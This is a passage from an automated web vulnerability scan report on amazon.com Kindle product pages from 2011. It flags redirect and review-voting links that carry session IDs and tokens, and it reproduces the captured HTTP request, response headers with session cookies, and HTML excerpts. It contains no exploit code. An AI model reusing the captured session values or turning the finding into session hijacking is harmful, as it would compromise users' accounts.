  • http://www.amazon.com/gp/redirect.html/ref=amb_link_353825462_12/191-9849773-1831958?location=http://www.pcmag.com/article2/0,2817,2368075,00.asp&token=6B5D74846F287633B361444F8611D03583758E3C&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M
  • http://www.amazon.com/gp/redirect.html/ref=amb_link_353825462_14/191-9849773-1831958?location=http://www.zdnet.com/blog/btl/review-my-20-minutes-with-amazons-latest-kindle/37252&token=5530EC54CBF650B76674ECF0F50AADBEFC9C0B6B&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M
  • http://www.amazon.com/gp/redirect.html/ref=amb_link_353825462_16/191-9849773-1831958?location=http://www.crunchgear.com/2010/07/28/amazon-reveals-new-kindle-139-for-wi-fi-version/&token=888A7FA0C2516C44AA33B5A80C267236CE93D96B&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M
  • http://www.amazon.com/gp/redirect.html/ref=amb_link_353825462_17/191-9849773-1831958?location=http://ireaderreview.com/2010/07/28/kindle-3-review/&token=48DB81F4832216373A8CF9DDF08F2A06EE62AE6A&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M
  • http://www.amazon.com/gp/redirect.html/ref=amb_link_353825462_2/191-9849773-1831958?location=http://www.nytimes.com/2010/08/26/technology/personaltech/26pogue.html&token=FC3BB6E90A3E8721ADB0B39F84805E48900EDACD&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M
  • http://www.amazon.com/gp/redirect.html/ref=amb_link_353825462_4/191-9849773-1831958?location=http://www.fastcompany.com/1684575/wanted-amazon-kindle-3rd-generation&token=3E149F19B6E9E7F0A5EBFF5447967C76704426D7&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M
  • http://www.amazon.com/gp/redirect.html/ref=amb_link_353825462_6/191-9849773-1831958?location=http://reviews.cnet.com/e-book-readers/amazon-kindle-3g-wi/4505-3508_7-34140425.html&token=31E3D690023DB719242D9ACF186BCE6C53185AEC&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M
  • http://www.amazon.com/gp/redirect.html/ref=amb_link_353825462_8/191-9849773-1831958?location=http://www.engadget.com/2010/08/27/amazon-kindle-review/&token=FF754E482756BF305A345655C9D0461CE99EA38C&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M
  • http://www.amazon.com/gp/redirect.html/ref=amb_link_354073722_1/191-9849773-1831958?_encoding=UTF8&location=http%3A%2F%2Fclient0.cellmaps.com%2Fviewer.html%3Fcov%3D1&token=F65275FC32A090EFBE50BC510943370FAF8CBE85&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-22&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1277899102&pf_rd_i=B002Y27P3M
  • http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_dp_ylApnb0SRCP6X?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB002Y27P3M%2Fref%3Dcm_sw_r_fa_dp_ylApnb0SRCP6X%26bodytext%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Wi-Fi%252C%2520Graphite%252C%25206%2522%2520Display%2520with%2520New%2520E%2520Ink%2520Pearl%2520Technology%2520by%2520Amazon
  • http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_dp_ylApnb0SRCP6X?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB002Y27P3M%252Fx22%252Fref%253Dcm_sw_r_tw_dp_ylApnb0SRCP6X%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Wi-Fi%252C%2520Graphite%252C%25206%2522%2520Display%2520with%2520New%2520E%2520Ink%2520Pea...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB002Y27P3M%2Fref%3Dcm_sw_r_tw_dp_ylApnb0SRCP6X%26count%3Dnone
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/191-9849773-1831958?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/191-9849773-1831958?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R2DD3INQCCS1RT/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=34040DAFFA8D9FF7D38AE1CFEC267643F302753F&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2DD3INQCCS1RT.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R2DD3INQCCS1RT/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=67C96CBDB127CADA2FE6B4C6C90A77D807347B28&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2DD3INQCCS1RT.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R2DD3INQCCS1RT/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=239124B8CDE626321FEF87F4FA5D23AAB3DEF3CF&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2DD3INQCCS1RT.2115.Inappropriate.Reviews&voteSessionID=191-9849773-1831958
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R2YVZNKUMWGYJ4/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=F4D3377DB2B4B5BDAFCA46384B42B1383F728255&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2YVZNKUMWGYJ4.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R2YVZNKUMWGYJ4/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=DF95BDF4B945C023B44855B9FEFEE9494DB99FE4&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2YVZNKUMWGYJ4.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R2YVZNKUMWGYJ4/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=45398D950F1929A712848FA11DAE56FAEDE1C83E&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2YVZNKUMWGYJ4.2115.Inappropriate.Reviews&voteSessionID=191-9849773-1831958
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RJUKFI4PVQ6E0/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=330222DF2979944A771EE86DB7040F720CF0E604&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RJUKFI4PVQ6E0.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RJUKFI4PVQ6E0/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=670B2440B1EC894C9D07A9066327BA7768EAAF48&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RJUKFI4PVQ6E0.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RJUKFI4PVQ6E0/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=7C301DD2579DCC72E2BFEE04ADBAEF6D4EF82AAB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RJUKFI4PVQ6E0.2115.Inappropriate.Reviews&voteSessionID=191-9849773-1831958

Request

GET /Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:35 GMT
Server: Server
x-amz-id-1: 0FSERHCXPR6RX175GC9Y
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: kR10u+vmtmJMjH8b0QtzQOA7YFXccTCuWSFp6hNB3ud9u6GhHvfORZRd53Wds1YX
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=191-9849773-1831958; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 738612


<html>
<head>


<style type="text/css"><!--


BODY { font
...[SNIP]...
</a>
<a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_ylApnb0SRCP6X?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&amp;location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB002Y27P3M%2Fref%3Dcm_sw_r_fa_dp_ylApnb0SRCP6X%26bodytext%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Wi-Fi%252C%2520Graphite%252C%25206%2522%2520Display%2520with%2520New%2520E%2520Ink%2520Pearl%2520Technology%2520by%2520Amazon" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_ylApnb0SRCP6X?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB002Y27P3M%2Fref%3Dcm_sw_r_fa_dp_ylApnb0SRCP6X%26bodytext%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Wi-Fi%252C%2520Graphite%252C%25206%2522%2520Display%2520with%2520New%2520E%2520Ink%2520Pearl%2520Technology%2520by%2520Amazon', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_ylApnb0SRCP6X?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&amp;location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB002Y27P3M%252Fx22%252Fref%253Dcm_sw_r_tw_dp_ylApnb0SRCP6X%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Wi-Fi%252C%2520Graphite%252C%25206%2522%2520Display%2520with%2520New%2520E%2520Ink%2520Pea...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB002Y27P3M%2Fref%3Dcm_sw_r_tw_dp_ylApnb0SRCP6X%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_ylApnb0SRCP6X?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB002Y27P3M%252Fx22%252Fref%253Dcm_sw_r_tw_dp_ylApnb0SRCP6X%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Wi-Fi%252C%2520Graphite%252C%25206%2522%2520Display%2520with%2520New%2520E%2520Ink%2520Pea...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB002Y27P3M%2Fref%3Dcm_sw_r_tw_dp_ylApnb0SRCP6X%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
<span class="shasta_att_coverage_map_link"><a href="/gp/redirect.html/ref=amb_link_354073722_1/191-9849773-1831958?_encoding=UTF8&location=http%3A%2F%2Fclient0.cellmaps.com%2Fviewer.html%3Fcov%3D1&token=F65275FC32A090EFBE50BC510943370FAF8CBE85&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-22&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1277899102&pf_rd_i=B002Y27P3M">Check 3G coverage area</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_2/191-9849773-1831958?location=http://www.nytimes.com/2010/08/26/technology/personaltech/26pogue.html&token=FC3BB6E90A3E8721ADB0B39F84805E48900EDACD&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_4/191-9849773-1831958?location=http://www.fastcompany.com/1684575/wanted-amazon-kindle-3rd-generation&token=3E149F19B6E9E7F0A5EBFF5447967C76704426D7&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_6/191-9849773-1831958?location=http://reviews.cnet.com/e-book-readers/amazon-kindle-3g-wi/4505-3508_7-34140425.html&token=31E3D690023DB719242D9ACF186BCE6C53185AEC&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_8/191-9849773-1831958?location=http://www.engadget.com/2010/08/27/amazon-kindle-review/&token=FF754E482756BF305A345655C9D0461CE99EA38C&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_10/191-9849773-1831958?location=http://www.pcworld.com/article/202146/amazon_kindle_3_the_best_kindle_yet.html&token=D9CB6E2A29AB1E9D9FDC167523A8318384D83181&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_12/191-9849773-1831958?location=http://www.pcmag.com/article2/0,2817,2368075,00.asp&token=6B5D74846F287633B361444F8611D03583758E3C&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_14/191-9849773-1831958?location=http://www.zdnet.com/blog/btl/review-my-20-minutes-with-amazons-latest-kindle/37252&token=5530EC54CBF650B76674ECF0F50AADBEFC9C0B6B&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_16/191-9849773-1831958?location=http://www.crunchgear.com/2010/07/28/amazon-reveals-new-kindle-139-for-wi-fi-version/&token=888A7FA0C2516C44AA33B5A80C267236CE93D96B&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_17/191-9849773-1831958?location=http://ireaderreview.com/2010/07/28/kindle-3-review/&token=48DB81F4832216373A8CF9DDF08F2A06EE62AE6A&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2YVZNKUMWGYJ4/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=DF95BDF4B945C023B44855B9FEFEE9494DB99FE4&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2YVZNKUMWGYJ4.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2YVZNKUMWGYJ4/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=F4D3377DB2B4B5BDAFCA46384B42B1383F728255&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2YVZNKUMWGYJ4.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2YVZNKUMWGYJ4/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=45398D950F1929A712848FA11DAE56FAEDE1C83E&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2YVZNKUMWGYJ4.2115.Inappropriate.Reviews&voteSessionID=191-9849773-1831958"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RJUKFI4PVQ6E0/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=670B2440B1EC894C9D07A9066327BA7768EAAF48&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RJUKFI4PVQ6E0.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RJUKFI4PVQ6E0/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=330222DF2979944A771EE86DB7040F720CF0E604&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RJUKFI4PVQ6E0.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RJUKFI4PVQ6E0/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=7C301DD2579DCC72E2BFEE04ADBAEF6D4EF82AAB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RJUKFI4PVQ6E0.2115.Inappropriate.Reviews&voteSessionID=191-9849773-1831958"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2DD3INQCCS1RT/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=67C96CBDB127CADA2FE6B4C6C90A77D807347B28&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2DD3INQCCS1RT.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2DD3INQCCS1RT/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=34040DAFFA8D9FF7D38AE1CFEC267643F302753F&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2DD3INQCCS1RT.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2DD3INQCCS1RT/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=239124B8CDE626321FEF87F4FA5D23AAB3DEF3CF&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2DD3INQCCS1RT.2115.Inappropriate.Reviews&voteSessionID=191-9849773-1831958"
>
Report abuse</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/191-9849773-1831958?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/191-9849773-1831958?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/191-9849773-1831958?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/191-9849773-1831958?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

9.68. http://www.amazon.com/Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22

Issue detail

The response contains the following links that appear to contain session tokens:
  • http://www.amazon.com/gp/redirect.html/187-6920967-0553225?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/187-6920967-0553225?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_dp_xlApnb13PTZNC?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0015T963C%2Fref%3Dcm_sw_r_fa_dp_xlApnb13PTZNC%26bodytext%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Free%25203G%252C%25206%2522%2520Display%252C%2520White%2520-%25202nd%2520Generation%2520by%2520Amazon
  • http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_dp_xlApnb13PTZNC?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB0015T963C%252Fx22%252Fref%253Dcm_sw_r_tw_dp_xlApnb13PTZNC%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Free%25203G%252C%25206%2522%2520Display%252C%2520White%2520-%25202nd%2520Generation%2520by...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0015T963C%2Fref%3Dcm_sw_r_tw_dp_xlApnb13PTZNC%26count%3Dnone
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/187-6920967-0553225?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
